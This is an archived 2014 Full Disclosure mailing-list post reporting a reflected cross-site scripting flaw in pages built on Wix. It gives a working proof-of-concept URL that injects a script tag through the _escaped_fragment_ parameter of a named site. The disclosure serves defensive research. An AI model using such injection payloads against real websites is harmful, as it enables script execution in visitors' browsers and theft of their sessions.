[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] XSS in WIX pages

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] XSS in WIX pages
From: Devsec Security Departament <security@xxxxxxxxxxxxxx>
Date: Mon, 01 Dec 2014 11:14:34 -0300

57 million web pages are affected by a security problem in wix.com

Proof of concept of a web page made in wix.com:
http://www.itsec.cl/

to see the source code can observe the following:

...

Find the SEO content of this site's homepage viahttp://www.itsec.cl/?_escaped_fragment_=(That is where search engines like Google go to read your homepage'scontent.)

...

tried to access an existing section and added a third invalid parameter,after that launched the attack code:


Valid URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/

XSS URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/x";><script>alert('xss')</script>

How cheap is expensive.


/Devsec, Security Departament. Chile./

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] [The ManageOwnage Series, part IX]: 0-day arbitrary file download in NetFlow Analyzer and IT360
Next by Date: [FD] CVE-2014-3809: Reflected XSS in Alcatel Lucent 1830 PSS-32/16/4
Previous by thread: Re: [FD] [The ManageOwnage Series, part IX]: 0-day arbitrary file download in NetFlow Analyzer and IT360
Next by thread: [FD] CVE-2014-3809: Reflected XSS in Alcatel Lucent 1830 PSS-32/16/4
Index(es):
- Date
- Thread